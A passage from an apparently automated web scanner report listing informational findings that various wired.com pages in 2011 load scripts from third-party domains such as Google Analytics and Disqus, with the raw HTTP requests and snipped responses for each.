User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:42:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=393
Expires: Wed, 12 Jan 2011 15:43:30 GMT
Date: Wed, 12 Jan 2011 15:36:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+444a62150484244cb53b00a25beec5d3cb07d94d+1294843325"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.92. http://www.wired.com/reviews/category/household/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/household/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+e5e3f85d40f5cad8c437f0fae504d8638feb65f0+1294843073
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/household/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:54 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=463
Expires: Wed, 12 Jan 2011 15:44:41 GMT
Date: Wed, 12 Jan 2011 15:36:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59509

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+e5e3f85d40f5cad8c437f0fae504d8638feb65f0+1294843073"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.93. http://www.wired.com/reviews/category/media-players/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/media-players/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+bf6b9a5ec231191dfcb33e30e8f2f60ef546df09+1294843330
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/media-players/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:42:11 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=453
Expires: Wed, 12 Jan 2011 15:45:02 GMT
Date: Wed, 12 Jan 2011 15:37:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+bf6b9a5ec231191dfcb33e30e8f2f60ef546df09+1294843330"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.94. http://www.wired.com/reviews/category/mobile-audio/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/mobile-audio/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+f903d00cb4002020d74f2b08e092ab0f7523b7ff+1294846660
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/mobile-audio/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/reviews/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 10:37:41 -0500
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:45:41 GMT
Date: Wed, 12 Jan 2011 15:37:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+f903d00cb4002020d74f2b08e092ab0f7523b7ff+1294846660"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.95. http://www.wired.com/reviews/category/mobile-phones/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/mobile-phones/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+5adfe3154fe6860740d960e4d28725c620795551+1294845355
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/mobile-phones/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:15:55 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=476
Expires: Wed, 12 Jan 2011 15:45:37 GMT
Date: Wed, 12 Jan 2011 15:37:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+5adfe3154fe6860740d960e4d28725c620795551+1294845355"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.96. http://www.wired.com/reviews/category/notebooks-and-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/notebooks-and-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+0a3a1ce6ce95ad4ba51b2d03446fde0159ff8296+1294845512
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/notebooks-and-accessories/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:18:32 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=476
Expires: Wed, 12 Jan 2011 15:45:44 GMT
Date: Wed, 12 Jan 2011 15:37:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+0a3a1ce6ce95ad4ba51b2d03446fde0159ff8296+1294845512"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.97. http://www.wired.com/reviews/category/roundups/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/roundups/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+47e844853076d7f854833c39c36b2b1326114536+1294843339
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/roundups/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:42:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=466
Expires: Wed, 12 Jan 2011 15:45:35 GMT
Date: Wed, 12 Jan 2011 15:37:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+47e844853076d7f854833c39c36b2b1326114536+1294843339"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.98. http://www.wired.com/reviews/category/software-and-apps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/software-and-apps/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+ef6220e1ac3b1e3ec4a5bcd3cd02936f2ee0b090+1294843079
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/software-and-apps/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=395
Expires: Wed, 12 Jan 2011 15:44:28 GMT
Date: Wed, 12 Jan 2011 15:37:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+ef6220e1ac3b1e3ec4a5bcd3cd02936f2ee0b090+1294843079"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.99. http://www.wired.com/reviews/category/sports-and-outdoors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/sports-and-outdoors/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+117a50df36f46eee206de29c15cd64ddf42c0071+1294845776
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/sports-and-outdoors/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:22:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=453
Expires: Wed, 12 Jan 2011 15:45:28 GMT
Date: Wed, 12 Jan 2011 15:37:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+117a50df36f46eee206de29c15cd64ddf42c0071+1294845776"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.100. http://www.wired.com/reviews/category/tablets-and-ebook-readers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/tablets-and-ebook-readers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+4d7ad3afaeac65fdee5474407d148fb0ec694efc+1294846458
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/tablets-and-ebook-readers/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:34:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:45:57 GMT
Date: Wed, 12 Jan 2011 15:37:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+4d7ad3afaeac65fdee5474407d148fb0ec694efc+1294846458"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.101. http://www.wired.com/reviews/category/televisions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/televisions/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+9668cd8773b5c7e6aa6df75a40ae2473948887df+1294843078
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/televisions/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=436
Expires: Wed, 12 Jan 2011 15:45:14 GMT
Date: Wed, 12 Jan 2011 15:37:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+9668cd8773b5c7e6aa6df75a40ae2473948887df+1294843078"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.102. http://www.wired.com/science/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/science/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /science/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=337
Expires: Wed, 12 Jan 2011 15:43:37 GMT
Date: Wed, 12 Jan 2011 15:38:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 68746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.103. http://www.wired.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/urchin.js
http://www.google.com/afsonline/show_afs_search.js

Request

GET /search HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=240
Expires: Wed, 12 Jan 2011 15:45:21 GMT
Date: Wed, 12 Jan 2011 15:41:21 GMT
Content-Length: 30114
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.104. http://www.wired.com/services/corrections/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/corrections/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

16.105. http://www.wired.com/services/newsletters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/newsletters

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

16.106. http://www.wired.com/software/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/software/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /software/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=33
Expires: Wed, 12 Jan 2011 15:38:41 GMT
Date: Wed, 12 Jan 2011 15:38:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.107. http://www.wired.com/techbiz/ previous next

Summary

Severity:	Information
